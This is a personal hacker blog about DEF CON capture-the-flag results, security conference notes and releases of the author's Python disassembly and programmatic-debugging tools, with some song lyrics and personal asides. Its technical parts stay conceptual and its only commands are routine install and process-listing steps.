-atlas wandering-
Bloggorama for breaking things

\

• /(40)

Subscribe
Subscribe to a (RSS) feed of this weblog.

Archives


This Blog

super...

well i spend my life dreaming super dreams
but i hate to wake 'cuz then i see
that i'm nothing more than a dreamer
superstar in my dreams, i'm a dreamer

see the lights of stardom calling me
because only then someone i would be
see my goal in life was to get there
never satisfied

i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?

guess i'm scard to wake from these super dreams
scared to live the life that's been waiting for me
what would life be like with no bright lights?
tell me who i'd be with no spotlight?

i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?


God you'll have to say who i really am
'cuz i cannot live in this perfect dreamland
but i heard your dreams might be better
and i hope somehow...

a superstar i may never be
and that is just a reality

i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?

-----
sitting in an airport, missing the ballgame, only really missing the commercials.
@

[] permanent link / /

Kenshoto bowing out of defcon?

Dude, I'm out in DC on business and I get to hang with some of the kenshoto crew. *amazing* times... but scary as well... I get the distinct impression they may not be doing ctf next year!? wtfo?


Freaked in Seattle... or DC... or something....

@

[] permanent link / /

3@stplace?!?

Dude, lastplace got sk3wl3d this weekend at defcon. For those newcomers who are lost, I'm referring to defcon capture the flag contest held each year in vegas. ctf has a history of drawing the best of the best from all corners of the world, and this year was even moreso. wowhackers and taekwon-v from Korea came on strong, overcoming the language barrier and doing very well indeed. Up until the last five minutes of the game, taekwon-v had lastplace relegated to fourth place! Thankfully, the lastplace superpowers blasted one last break-through just in the nick of time to finish a solid third-place (indeed, kenshoto even changed our name on the score-board to 3@stplace ;)

Sexy Pandas were sexier than ever this year, taking command of the game very early on. Unfortunately, as they did last year, the pPandas seemed to lose their Gambas around the middle of Saturday. I don't know what's up with them, but I'm guessing they need to learn to cope with more sleep-deprivation :) They were amazing while they lasted though (remember, they drew first-blood last year).

Shellphish was back again after "taking a year sebatical", having not qualified last year. While it was good to see Giovanni Vigna and his team again, I was surprised that they didn't do as well as expected. As I can say the same about our team this year, I totally understand.

IGuardMiLan (sorry, I don't remember their real name), an Italian team from Milan, seemed to be doing very poorly (and unfortuantely I didn't get a chance to get to know them much)... but on Saturday night kenshoto gave out a challenge and ominously indicated it was worth "a couple hundred points" and both Shellphish and these guys nailed it! I'm not sure what it is about these Italians ;) but the challenge turned out to be worth 300 points, which they both got! Rock on! Unfortunately for the Pandas, this placed both of these teams above them. The challenge was this: kenshoto provided a text file with all of shakespeare's works. our job was to find the longest run of bytes which convert to x86 opcodes which don't touch memory. Very cool challenge, I spent a little time on it, and actually found the answer with the tool I wrote. However, without my emulation code in place I also turned up many false-answers, based on conditional-jumps so I dropped it. Bummer too. I wish I would have submitted it.

The Routards were back from last year, and came out of nowhere on Saturday to overtake us as second place, where they remained for the rest of the game. A French/Suisse team, they were really smokin!

And then (sound the Emperial March) came the Sk3wl 0f r00t. Lead by Jon Boss ("BossMan") and driven by Chris Eagle ("sk3wlmast3r"), these guys *completely* rocked our world. For the last two years lastplace has been stealing victory right out of this team's clutches using creativity, game-play, and a slight touch of evi1. This year, Sk3wl returned all we had given them and more. Probably most evi1 was when we used some technical prowess to keep Sk3wl from getting credit for many points last year, for several periods of several hours. This year, Sk3wl multiplied both the evi1 as well as the technical awe of our attack from last year, instead, denying any of our teams the ability to score. How they did this, I can't say specifically, but let's just say they pwned the services themselves and made their own version of a "service-r00tkit", modifying information to either prevent us from gaining shell on the box or changing the contents of keys so we received bogus keys and our overwrites were dorked as well.

I gotta admit, if we couldn't win, I'm ok with Sk3wl winning. Not only did they *totally* deserve it this year, but they're a great bunch of guys. I have a lot of respect for sk3wlmast3r and Bossman and the team they fielded this year was truly outstanding. Their game-place was flawless, their technical leetness was untouched, and they have real character. At the end of the game, they set-up their own projector on the wall over their team and played Guitar Hero... lol... but before they did, Bossman came over and said to me "I know this is going to seem arrogant, but this was not our idea... and I just wanted to let you know." That was pretty cool of them. They had every right to rub it in, but chose not to. rock on guys.

Ah, my dear lastplace.... On a personal note, I think it was really good for us to lose this year (sorry team, it's what I think). We came in as two-time, back-to-back winners, and a third time would have already been difficult to remain humble about. We also had let ourselves get complacent. I'm sorry guys, this one falls completely on me. As the buck-stopper, and as your captain, I failed in many way, the chunks of which I will not spew here. Having succeeded from the very beginning, I knew I/we were doing the right things for success... but I didn't really remember what the right things were this year... so it was a growing experience. Having not been defeated, I personally felt the stress of continuing the winning streak, even as much as I struggled against it. And after three consecutive wins, I was heavily considering "retiring" at least for a year or two. Now? I'm not quite sure what's going to happen. I know some of the guys are happy to field a team again next year. I'm going to hit 'em up in a few months. ctf bears some strong similarities to child-birth . Gradually one forgets how much pain and agony and misery goes into ctf, and for some crazy reason the desire to play again returns :) On the positive side, we played a very good game, aside from a few failings of mine. Most impressive to me is how much our attack-team has improved as a whole. We still have a couple rock-stars, but each of our attack team were "in the game". psifertex, jrod, jesse, drb, and myself, we were all in the same playing-field. That doesn't mean I think we don't need to do some training soon. I've got some very specific things in mind and there are many others I'm sure. But I got to see some of the other, lesser-contributors last year really stepping up, and that encourages me that the team is doing what it's meant to do. I'm also looking forward to our feeling challenged to excel... instead of just being "good enough".



To show up to the game is to be a winner. Each of the eight teams has to qualify in order to play the game (the returning champions don't actually have to play the quals round, but by being champions they already "qualify"). This year, well over 400 teams showed up for quals, and actually answered at least one question. I think at least 150 teams answered two or three. This is pretty significant, considering. Each of the teams I got to chill with this weekend had significant skillz, and it was an honor to be among them.



Ok, here's the (teasing) rant part of this blog post. Each of the teams playing in ctf qualified for the game... except one. One additional Korean team qualified this year, but they dropped out and we ended up with the first runner-up... That wasn't so bad (in fact, I was happy at the time because I have friends on the team which got to come). However, little did I know that this "first-runner-up" team would go on to completely dominate the game, shutting down our ability to score, and run away with the competition. That's right, folks. Sk3wl 0f r00t *failed to qualify*! lol. Oh well. </rant> I'm still glad they came. However, this highlights the reason lastplace has taken part in quals each year even though we didn't have to: ctf and quals are two very significantly different games, each one being amazingly awesome and worth the time and effort. kenshoto continues to deliver top-notch entertainment for the subversively-minded binary-hacker.



Many thanks to kenshoto, and especially to my good friends visi and squires... who did bring a fully-automated nerf-gun into my talk at defcon and launched a massive assult on the stage... that was awesome. In an otherwise draining and sad day, that gave me a great boost. I warned the crowd they might have to wake me up in the middle of the talk. I had bounced all over throughout the country, flying, driving, not sleeping, etc... and was already exhausted when I showed up for the sleep-depriving all-weekend siege of ctf.

BTW - If visi doesn't see fit to keep vtrace/vdb available from http://www.kenshoto.com/vtrace I may be lead to post them here.


sk3wlmast3r rocks. Let me just say that. He's an awesome guy, and one of the most brilliant reversers I've ever met. The last two years when lastplace beat his team, he was exceedingly gracious, meeting me with a (albeit disciplined) smile and congratulations. There's no doubt about the fact that he currently dwarfs me in skillz... but I've always been impressed with the man behind the evi1 :) I got to go see his talk at defcon (after ctf) and it was pretty slick. Keep on, man.


disass-v4.0 didn't make it for ctf. Sadly I had to use a mixture of disass-v3.0 and IDA to work on the vulns. This will continue to consume me for some time, until I have a workable GUI or I give up the whole mess (and mebbe write a CLI). I'm currently considering opening up development to interested outsiders, as it's quickly growing beyond something I can/want-to maintain alone. I'm not a GUI programmer, and would prefer telling someone how I want the GUI to behave and then go write the cool methods the GUI calls to actually do the work. Just a heads-up.


I got to spend time with a smattering of great friends this weekend, too many to list, and way too short a time to spend with each. But I wanted to send a shout-out to my awesome team, drb, wrffr, psifertex, mezzy, plato, shiruken, jrod, apu, and a couple guys who hung with us a bit and helped out some with a couple bins, and all the ctf teams (you all rock). Greetz to sk0d0 and jmfb, Figueroas, Subverted Dave, j0hnny, Thor (even though you skipped out on me :) Travis Goodspeed, GMark, vangelis, kenshoto (inc goons and pj, nice dice), Moose and VirusX (now *with* the Moose! thx for the Braundo dude, it kept me up on Saturday!), and the dudes who came to my Q&A session,


R.I.P. E P I C. I missed you. If we'd won ctf I was going to say it from stage.


@

[] permanent link / /

Quals 2008 Comes To A Close... (a week late)

Well my friends, CTF Quals 2008 has officially past, and what a wild ride it was. I'm barely awake this morning, not fully recovered from the weekend... but I'm sure some of that has to do with the incredible Paintball-Bachelor party I was called upon to make happen on Saturday. Yes, my team had to do without me for about 12 hours of the competition. I'm the best man, what could I do? Thankfully I have a brilliant team and a very strong co-captain. Even without me, they had to pull back a bit to avoid directing the game. You see, as last-year's CTF winners, we don't have to qualify (place in the top 7 teams), and feel a little awkward about choosing categories which could make or break other teams.

Intro to Quals
For those of you who are unfamiliar with the phenomenon that is Quals, each year Kenshoto, a terribly cool bunch o' hacker puts on the Defcon Capture-the-Flag hacking contest, but to get into the contest your team has to qualify. Quals (ctf Qualifier round) typically takes place a week or two after Memorial-day, and is a Jeopardy-like game with five categories with five challenges each providing from 100-500 points (no, there's no Double-Quals entry where you get to choose how many points to gain/lose). Unlike Jeopardy, in recent years Quals doesn't reduce points for wrong answers, and while each team somewhat chooses their own pace, you can only select challenges that are "available". The team who answers the newest challenge first gets to choose the next challenge, making it available to the rest of the teams. Quals has always been an excellent training-ground, and a worthy game in and of itself. In fact, Quals in 2005 was my entry and training-grounds for hard-core binary hacking.

If you remember last year, all the leading teams made it through all but one of the challenges, and it was the Binary Leetness 500 point challenge. It was insane and incredible, and worthy of spending our time. This year was a bit more of everything (except web-hacking, but more on that in a minute). The only down-side I ran into this year was BinLeet300, a challenge which I feel could have been better scoped or something. The question was "What libc function is this?" and we were given 57-bytes of binary which converted into basically a spinlock and a strlen. The question lead me to believe that I got to see the whole function, although I have heard the answer was inet_aton. what?

However, that's a minor complaint, whereas the whole rest of the game was amazing. First off, let me just pay homage to kenshoto's ability to keep the game stable!

Forensics 500 was quite the challenge, being an image of Kenshoto's logo, requiring conversion to another format and then analysis of the colors to identify an undisclosed form of stego.

BinLeet400 was a BSD kernel module which replaced much of the kernel call-table (yes, rootkit-style) with pass-through wrapper versions.

My favorite of the whole game was RealWorld300, a telnet-based D&D style game. Enter your name, hack your way through (literally, but the game was an RPG about hacking), and if you win, you find yourself the proud recipient of a format string exception. Through that FSE, you have to figure out what address to overwrite and what to overwrite it with. Thankfully, the FSE is great for stack-based recon. Read the write-up on http://nopsr.us to find our nifty stack-address-math-magic. Very fun, and I think the best part was getting to hack along-side drb most of the time. He's a brilliant friend, but we always seem to be working on separate tasks.

One interesting thing was the loss of the WebHacking category. I feel it is a loss indeed, as this is where most vulns are found these days... however, with the inclusion of RealWorld, I think the game was better this way.

Sk3wl0fr00t did not qual this year... perhaps sk3wlmast3r had a Bachelor party to attend as I did. I don't know what happened for them this year, however this is a great example of how different quals are from ctf (not that I'm complaining, they're both amazing). I'm sure that someone will drop out and that this ctf-titan will once again be making the competition difficult for all of us.

Shellphish was among the teams to qualify for ctf. Proven to be powerful in the past, this former-ctf-champion failed to qualify last year for whatever reason. Lead by Giovanni Vigna, Shellphish will make the competition interesting to say the least.

For those with a pair, check out the Quals write-ups over at http://nopsr.us

Yes I'm Hacking Fun Now.
@

[] permanent link / /

New Releases

After much anticipation ;)

disass-3.0-080424.tgz
libdisassemble-2.5-080424.tgz

Sorry, but no GUI yet. Still working on a great deal of changes for disass, including disass-emu, an emulation framework for x86. As you can imagine, these take an immense amount of work. Kenshoto has asked 1@stplace to create a challenge for the impending CTF Qualifiers, and its been eating up a great deal of my time lately.

Hack Fun!
@

[] permanent link / /

Post Shmoocon 2008

Well the great and mighty shmoo has left the building. What a weekend. I'm beat.

I couldn't get in until Saturday night, but I hear Friday and Saturday were amazing. Everything from H1kari's FPGAs attacking cellular to hacking Second Life's helper apps (dude, they really hacked quicktime through the game!? sweet!). Jay Freakin Beale had an acapella rap-cameo by his fellow Intelguardian JimmyD! G Mark is always interesting to hear and cool to chat with. Simple Nomad apparently had a picture of him on CNN (Crappy Network News) where they named him Mike and made him look like Winn Schwartau! Unbelievable. All I have to say is WWDKD? ok, just listing Dan Kaminski in a place where Jesus has been is making me step away from the keyboard....


<long pause>

ok. I'm back. No lightning yet... although I've checked my life insurance.

I had a beer scheduled with Moose, but nothing ever came of it (sadly). Hopefully we'll be able to sit down and chat some other time. Same deal with Joe from learnsecurityonline, but at least we hooked up by phone. He's putting together a cool set of binary reversing challenges for his readers and has graciously asked for my input and possibly help. We'll see what comes of it.
And Darren from hak5 was also supposed to catch up with me after my talk (9am was too early for them :) but he got held up as well. I'm thinking the parties were just too good, because by Sunday everybody was asleep. I actually drank red bull just before my presentation to try to regain some kick I had lost. Yes, I went to the shmoo party and got to see Pablos and his gang break it down. What was amazing was the number of folks in blue lock-shirts that cut a rug. Even Ed Skoudis was doin a dance! Jay MFBeale, well, you see there are dancers and there is Jay.... the difference? Dancers get tired and take a break. Jay is a freakin animal! Lara, dude, Lara. But the man with presence, Mike Poor, was dancing the whole freakin night! Whatever they're drinkin at Intelguardians has got to be better than redbull! gimme some-o-dat! I spent most the night over in the corner writing code. No, I'm not completely inept on the dance-floor, but I wanted to get a few things tweaked and tuned before my talk. Just because I gave a talk on the same topic at POC doesn't mean I don't work a lot on it in between. Programmatic Debugging for Vulnerabilities is a relatively new topic (at least for public consumption). Expect the topic to hit BH and defcon this year as well (if they'll have me), and full of untapped potential.

To be specific, and not just another "blogger positing his empty opinion", I was truing up the code which determines heap chunk length. Finding buffer overflows is not a simple task, and at the very core of that search (at least in this approach) is being able to consistently determine interesting values for buffer length. Stack buffers and heap buffers both present their own challenges. At POC I had the concept of measuring stack buffer length by finding a valid return pointer higher on the stack and measuring the difference. For that I developed findRET(), which, once I worked out a few bugs, is quite accurate. For HEAP chunk length, however, I was focused on DL Malloc and relying on HEAP chunks keeping their buffer length at ptr-4 (the 32-bit number immediately preceeding the memory pointer location). Unfortunately, many of the calls to memcpy() are copying portions of a HEAP chunk (since HEAP chunks are often cut to the size of a structure), so the values immediately preceeding many destination HEAP buffers is anything but the length of the buffer. That length may have been implied by the struct used to access the HEAP chunk, but that information is long gone, and must be reversed (another great topic).
So this time around I improved the HEAP length issue by running the allocated HEAP structures (again, DL Malloc, but RTL won't be hard to add). Once I find the HEAP chunk past the HEAP address we're measuring, we take the difference as the length. The odd thing I found was that the HEAP in some binaries (eg. top on linux) doesn't start at the beginning of the HEAP memory map. So, tracing the HEAP means finding it first. So you'll find code in getConnectedChain() that first searches for a connected chain of HEAP chunks before traversing it and returning the start of each HEAP chunk.

I need to mention that these methods are still somewhat archane and unrefined. They will indicate the most fruitful overflows, such as overwriting RET or the HEAP control structures.... They will not indicate overwrites which occur within the same HEAP chunk or between stack buffers.

Slides are here: odp pdf
New releases of atlasutils (formerly the @ Utility Belt) is coming shortly.


Found a few interesting links about the con, one was an interview I did with Joe from LearnSecurityOnline.com.
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,2112.msg8708/topicseen,1/
http://www.learnsecurityonline.com/index.php?option=com_content&task=view&id=237&Itemid=1


Greetz to visi and squires, alien and hackerprincess, sk0d0 (nice pic!), sk3wlmast3r & son, Toby and joshwright, G. Mark, chris paget, vangelis, beetle, hollywood and jsyn, keith myers!, Intelguardians (choops for supporting the con!) and ASI guys. It was excellent to see you all again!
And thanks to those who came to my talk (for not stepping in front of the wizzing redbull and causing legal headaches!) Dude, Chuck, smile! Seriously, I hope you all enjoyed the talk and got something out of it.

@

[] permanent link / /

POC Demo Instructions

I originally was going to publish a video of me performing the demonstration I included at the end of my POC presentation.
Obviously, that hasn't happened. It took about all the time and energy I had to complete the atlas utility belt when I did, and I'm just starting to recover from the past three months (or rather, my wife is).

I much prefer encouraging others to have their fingers typing anyway, so I'd like to post instructions for doing the demonstrations yourselves.

First download and install vtrace and atlasutils...
This consists of:

$ tar zxf vtrace*gz
$ cd vtrace
$ sudo python setup.py install

(atlasutils is the same process)

Once you have installed vtrace and atlasutils, here are the demos, step-by-step. If you don't get similar results, please email me at here and should be in the local directory)

1. Start up kcalc (only have one instance running)
2. From a shell prompt find out the ProcessID of kcalc by typing "ps ax |grep kcalc"
3. "./memgrep.py 'kcalc'"
4. Many instances of 'kcalc' should show up, along with a virtual memory address in hex for each

LivePatch demo

LiveOrganTransplant demo

[] permanent link / /

atlasutils 2.2.5 release
Happy Thanksgiving to all those who celebrate it. I have much to be thankful for, and I am.
At long last, here is a new release of atlasutils, formerly known as the @ Utility Belt.
This release includes an increased wealth of command-line utilities (including VulnCatcher.py), poorly documented as always, and several new python libraries, most notably disassutils.py and vtraceutils.py. These libraries require libdisassemble and vtrace, respectively.

What will most likely interest my Korean friends is found in vtraceutils.py and the VulnCatcher.py script. VulnCatcher lays out an infrastructure for leveraging programmatic debugging to identify vulnerabilities, not only providing locations in code, but also key information required to exploit it. For more information, see my presentation slides and whitepaper (in my previous blog entry). There are still some rough spots to iron out, and many more breakpoints to be created.
Vtrace on Ubuntu has been giving me some fits handling some Breakpoints correctly. Invisigoth should have a new release for us soon.
Note findRET() in the vtraceutils library, my first release of a stack-backtracing tool. It seems to be quite accurate, but complaints and bug-reports (and fixes) are always welcome.

Thanks for your support. I hope you enjoy the toyz.
@

[] permanent link / /

Got Seoul


Just flying back from Seoul, Korea, where vangelis and some pretty awesome Korean hackers put on the POC 2007 con (Power Of Community). Very cool conference. A large amount of brain-power in that building. Got to hang with friends vangelis, Dave Aitel, and The Grugq, and many other great hackers. Great talks there including hacking Web 2.0, hacking from a Nintendo DS, some debugging talks (including Dave's and mine), hacking COM (very cool!), and my personal favorite: hacking BIOS and VMware (gee, now that sounds familiar...).

I gave a talk on programmatic debugging using one of several powerful and new debugging API's for your favorite interactive scripting language. It covered several ways that these tools can help in hacking and in particular an approach to make vulnerabilities suddenly appear. The presentation slides can be found HERE and the whitepaper HERE.

My many thanks to vangelis for inviting me to speak at POC2007 and to the many great hackers I got to meet at the conference. Seoul was beautiful and the people very friendly. I was honored by the reception that J and I received by people and hackers alike.

Special choops go out to the following hackers and friends:
Sun Bing - whoa dude, nice work... and in your spare time no less.
AmesianX - you are simply brilliant, nice work
Boem - thanks, friend. I appreciated the chill-time with you
GilGil - Nice work. Keep coding and fighting the good fight. Freedom.

vangelis, Dave, Grugq, Heinrich... it was great. Thanks for making the trip great for both me and J. You all rock.

@
ps. watch for new releases of the @ Utility Belt as well as some demo instructions for vtrace fun hopefully this week...

[] permanent link / /

Power of Community

Next week I'll be flying out to Seoul, South (perhaps soon to be combined?) Korea.



no time to say hello goodbye I'm late I'm late I'm late...

@

[] permanent link / /

Bluetooth Hacking by Josh Wright

Check it.
Love it.
Share



@

[] permanent link / /

FINALLY: @ Utility Belt and Disass v3 Released!


Hey all,
Sorry it took me so long after defcon to release these. It's been crazy (thus the 2am posting time)

Disass v3.0 has been rewritten from the ground up, utilizing the 100% Python libdisassemble instead of relying on objdump like previous versions. This has been a bumpy road, but I think it is a positive step. I didn't get nearly as much accomplished as I would have liked, but the core disass is there. The idea was to include interactive python scripts which interact with the disass objects to find vulnerabilities. Alas, that will have to wait, for the moment. Too many other things pressing. If you are eager to see this progress, download the tool, play with it, and then email me feedback (heck, bug reports are good too). I now maintain libdisassemble, along with Matthew Carpenter from Intelguardians, so anything that looks strange or disassembles differently with IDA or some other tool, please let me know. YOU MUST HAVE INSTALLED THE @ Utility Belt IN ORDER FOR DISASS TO WORK!

@ Utility Belt v2.2 - This is not really a rewrite, but new tools have been added, older tools have been cleaned up, and a python installer has been included, to install the scripts into the command path and the libraries into the appropriate locations. This is also the first release to split disass away from the belt.

To install either of these tools, untar them, chdir into the appropriate directory, and execute the following:
"sudo python setup.py install"

Good luck and happy hacking!
@

[] permanent link / /

Play it again, Sam

It's been a week and I'm finally getting a chance to write about it. defcon 15 was another amazing ride. My talk went well, I got to hang out with friends, and oh don't forget another round of black badges and leather jackets.
Once again, I can brag on my ability to surround myself with amazing folk. drb, fury, jrod, mezzendo, plato, psifertex, shiruken, wrffr, each talented, each proven capable of finding and exploiting binary vulns like buffer overflows, and each a key part of our team. I'm honored to have them on my team, and have been rewarded with two years of victory at the con.

We were impressed with a great showing by the Sexy Pandas from Spain, who were the only other team to take the lead throughout the game. But once again, the most amazing team we competed against was the Sk3wl of r00t, largely from the Naval Postgraduate school. The most potent, once again, was Sk3wlmast3r.
Also featured this year were teams from Korea, France, and I believe, Sweden. This year, kenshoto put on yet another amazing game, but with fewer glitches. Only a couple network glitches which caused interesting submission issues.

I'd like to take the chance to reiterate my respect for everyone who made it to that game. To qualify for CTF is to win.

Not a lot more to say than that. Thank you gentlemen.

@

http://outflux.net/blog/archives/2007/08/07/flag-captured-again/
http://www.alligator.org/pt2/070809defcon.php
http://insideuf.ufl.edu/2007/08/13/hacker-win/
http://www.johnhsawyer.com/2007/08/1stplace-wins-defcon-ctf-2-yrs-in-row.html

[] permanent link / /

The world-famous Idylwood

I just got to hang out at the Idylwood Grill, a very classy restaraunt in DC, where it brings value to an otherwise uninteresting strip-mall. I was hanging out with my good friend invisigoth, and some other *very cool* kenshoto folken (greetz Troy, Jim and Jarod, it was awesome).
The Idylwood has been world-famous at least since this year's CTF quals used a picture of the Idylwood in one of the Forensics challenges, and the name *was* the key for the challenge.

I got to also hang out with the owners, Heady and Marco, their lovely waitress whose name escapes me, and PJ, an all-around good guy.
We chilled until they closed down and the Idylwood became the Kenshotowood, as we were the only ones left. We partied until it was seriously too late... playing Pirates Dice (aka Liar's Dice), drinking port, and realizing the pirates within... (for the record, I'm still more ninja than pirate, but at 2am who really cares?).

Great time guys. Many thanks for the invite, the *outstanding Filet*, and excellent comraderie.

adieu
@

[] permanent link / /

LIBDISASSEMBLE v2.0 released

Hey all,
I have been working on ImmunitySec's libdisassemble along with Matt Carpenter of Intelguardians. After Matt and I modified a significant portion of lesser-used opcode-processing and addressing methods - like good little open-source folk sharing the updates with the upstream owners - ImmunitySec decided to release the updated libdisassemble as v2.0, and asked us to do the press release. Matt being a somewhat quieter one among us (yes, I realize what that says about me) I decided to announce the release here. He said something about writing something up as well, but I'm not holding my breath (seems the job keeps him pretty busy these days).

PUBLIC RELEASE ANNOUNCEMENT

ImmunitySec and friends have released version 2.0 of LIBDISASSEMBLE, a 100% Python opcode disassembly library for x86 processors.

Disassembly routines are essential parts of debuggers, disassemblers and a variety of other reverse engineering tools. libdisassemble fills the need for the many security-related products and projects which are being developed using the Python language. Since libdisassemble is 100% Python, the code remains fairly easy to read and interface with, it is self-documenting using Python's built-in tool Pydoc, and maintains relatively high speed. It's not C, but it's not C either.

This version aims to provide a complete disassembly of IA32 instruction set. Future versions will include the addition of IA64/32 instruction set.

ImmunitySec is a software security and consulting company. They provide enterprise application assessments, customized training, and security software solutions such as CANVAS, SPIKE, SPIKE Proxy.

Intelguardians Network Intelligence LLC is a vendor independent Information Security Consultancy based in Washington D.C. Our experts lead the industry in security auditing, penetration testing, forensics, Incident Response and Architecture Review.
Intelguardians offers complete security solutions for the global market. Whether you are a CIO or Director of Security, a government agency, or a corporation needing Assessment, Response, or Mitigation Services, our team of Intelguardians stands ready to serve.

atlas is, well, atlas.

Download LIBDISASSEMBLE v2.0 HERE
Please feel free to send bug reports to atlas and Matt Carpenter

@

[] permanent link / /

Weekend of Undead

Capture the Flag Qualifiers have just completed, and what a weekend.
Basically, a bunch of haxx0rs-turned-zombies by no sleep and too much coffee.
As usual, Kenshoto put on an outstanding game-show. Modelled after the modern gameshow giant "Jeopardy", there were five categories each with five challenges, ranging in difficulty from "my secretary could answer that" to "HOLY CRAP MAKE IT STOP! IT HURTS!" (rev500 anyone?)
1@stplace was not required to compete since we won last year's CTF event. So we showed up under a different name. All that free experience and fun going to waste! I think not! Some argue that last year's quals were more fun that CTF itself! Besides, quals are a great way to really mold a team together. And by 5pm on Sunday, patience and teamwork are vital. "Hey! WOULD SOMEBODY STOP KILLING MY GDB SESSION!" oh wait, that was me. Perhaps I needed a little more patience (sorry guys). My team did excellent work and the competing teams in the quals showed some serious talent! The game even drew in some hackers so "leet" that they don't want to be known (notice two teams "stepped down"? ok, maybe one team stepped down because of their name...). This year's CTF is guaranteed to be a real struggle.

Final scores can be viewed at the kenshoto web site (minus ours, of course).
1@stplace is considering putting together a walk-through like we did last year

See you at defcon!
@

[] permanent link / /

defcon 15 - Remedial Heap Overflows, DLMalloc-style

Sorry for such a lame two-month update, but here it is
------------------------------------------------------
Hello,

Congratulations! DEFCON is pleased to accept you as a speaker at DEFCON
15. You are one of the first to be accepted, so please bear in mind the
website is not fully updated yet. I will be communicating with you often
to remind you of deadlines and to give you updates. If you have any
questions please don't hesitate to ask.

Please keep an eye out within the next few weeks. I will try to send you
an "updated" Acceptance letter when the official speaker selections are
announced. In the meantime you may find your talk, abstract and bio
online at: http://www.defcon.org/html/defcon-15/dc-15-speakers.html. If
it is not online now, it should be up within the next few days.

Please be sure to monitor your email for requests, periodic updates and
reminders. Once again congrats, If you need anything, don't hesitate to
ask. I look forward to meeting you in Vegas again this year!

--
Nikita Caine,
Administrator Of Khaos,Defcon.
http://www.defcon.org
[e] Nikita@defcon.org
[T] 206-280-2294

"Like Shuffleboard only a lot less violent."

[] permanent link / /

shmoolet

This is labelled shmoolet because it's a little blog about shmoo.
Shmoo was great this year, and it had largely to do with seeing you all again. It was great to reconnect with friends I only see once or twice a year.

Hilites of the con:
* ASI put up a "hackit" challenge, a bunch of puzzles which reminded me of a few areas I'm rusty or downright bad at. Good exercizes. The ASI guys themselves were pretty awesome too. Great job guys.
* H1kari and friends showing that the cryptography numbers games has shifted in favor of the attackers. Crypto has always been a numbers game. How long do you need the information to be safe? 100,000,000 years? Fine, here's your crypto algorithm. Unfortunately (fortunately for some?) use of FPGA's has proven to yield roughly 1000 times the processing speed of modern x86 hardware. Time to recalculate our crytpo safety...
* Raven with the gratuitous name-drop of GPF (General Purpose Fuzzer), written by my friend JROD
* Raven and j0hnny long being verbally (and physically?) accosted (WTF is that about!?)
* atlas and his mild mannered alter ego having some identity crisis
* SHMOOBALL FIGHT! Closing Ceremonies has never been so fun ;)
* kurios nearly ripping someone's arm out of its socket clammering for Keith Myers CD.
* Renderman and sharing of Shmoo-tables (choops render)
* Kevin Mitnick hogging Renderman's Shmoo-tables. Shame on you :)
* Keith Myers rockin' the third-story of some cattle-herd bar (ie. we couldn't really move, unless the guy (or hopefully girl) next to you moved. Made dancing interesting. Almost a sort of line-dancing orgy. I just drank and watched.
* Jay Beale and Sharky cuttin' a rug.
* Window
* Jay Beale and his "posse" at 2:30am
* Intelguardians and the magical blue
* H1kari's less-crowded party (thanks for the breathing room!)
* G Mark and hacking at 50. Great talk. Great guy. Great insight.
* Bio-warfare with certain individuals' sickness.... ew...

Take care all. Hopefully see you all again at defcon.

@
ps. Yes, I was there. I was incognito.

[] permanent link / /

disass v3.0
disass v3.0 is staged and currently in alpha status. It disassembles using a modular infrastructure, allowing for different disassembly libraries (currently using py/libdasm), and virtually any type of binary executable format. Currently, deep support of ELF binaries is included, and basically reuses a lot of concepts from disass v2.3. A PE parser has just been completed, but is still considered alpha-level. A Mach-o file parser is scheduled in the near future, as is plugins for other disassembly libraries, namely Immunity's libdisassemble.

Many other vuln-finding additions are on the drawing-board.

One of the biggest differences from the 2.x versions is objdump is no longer used. disass v3.0 is basically a complete rewrite, leveraging things learned from v1.x and 2.x. However, both previous versions have relied completely on textual output from objdump's disassembler. disass v3.0 is dealing with opcodes, not lines of text. This is proving to be very powerful. It is also proving to be a new learning experience, as memory-usage and processing are have to be balanced. Currently, disass v3.0 is every bit as fast as v2.3, with much more power. Better leverage of OOP allows for better tracking of jmps, calls, and now the addition of Memory Reference tracking. More complex applications build structures of functions, and rather than calling the address directly, the function address is loaded from memory into a register and called from the structure. This is particularly true of event-handling code. Subs will now indicate if an address has been referenced in another sub. While this doesn't tie the caller to the sub, it should provide some grounding and ties to the data-structure which will later be used to call the sub. Have fun all @

[] permanent link / /

Alive and Well

... and no longer subcontracting code to anyone named "Smeagol" or "Gollum". First of all, this guy has some *seeeeerious* personal issues (namely, continually trying to strangle me then retreating with a meager "Smeagol is sorry, Master"), but worse yet is this guy's code!

/home/atlas/hacksans504
Traceback (most recent call last):
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 75, in ?
from disass3 import *
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 538, in ?
me = disass('/bin/bash')
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 114, in __init__
self.init()
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 122, in init
self.memory = VirtualMemory(self.EXE)
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 312, in __init__
self.init()
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 317, in init
self.parse(sec.getBytes(), sec.VMAstart)
File "/usr/lib/python2.4/site-packages/disass3/__init__.py", line 335, in parse
self.SUBSs[startaddress+offet] = sub
AttributeError: VirtualMemory instance has no attribute 'SUBSs'


WTF is "SUBSs"? Totally over the line. It's bad enough to deal with constant spluttering of his SSSSSSsssssss-riddled vernacular, but Python says he goes... so he goes. Sayonara Smeagol.

(yes, the whole post is a humorous take-off on my own typos... and yes, this means that disass3 is on it's way)

@

ps. Watch for me at defcon 15. I'm submitting two talks (one of them a joint effort with drb) so hopefully someone will fall for my deception and think I know something.

[] permanent link / /

new Years(update);

Hey all,

Life is rockin'

vtrace/vdb

job update

teaching

toplap

cable/biz internet

refugees

[] permanent link / /

9/11, Outage, and DCG

Hey all,
I know it's been a while since I last wrote, and things have been going crazy! I've been undergoing a job-change, going crazy with the kids and family, going camping, etc... so let's get down to business.

9/11

Outage

DCG616

[] permanent link / /

And now for something completely different...

Ok, so not really. More of the same for the moment. A bit more on defcon capture the flag... hey, when the waves are high you ride 'em.

Start out with a picture of the last second the scoreboard was up (approx 15 minutes before the end of the contest):


And a few more links of interest:

An overview of the challenge (thanx drb)
Nice writeup by George Ou (famous for wireless security, etc... Thanks George!)
My previous blog entry
Article on the compentition(update: gone dead?)
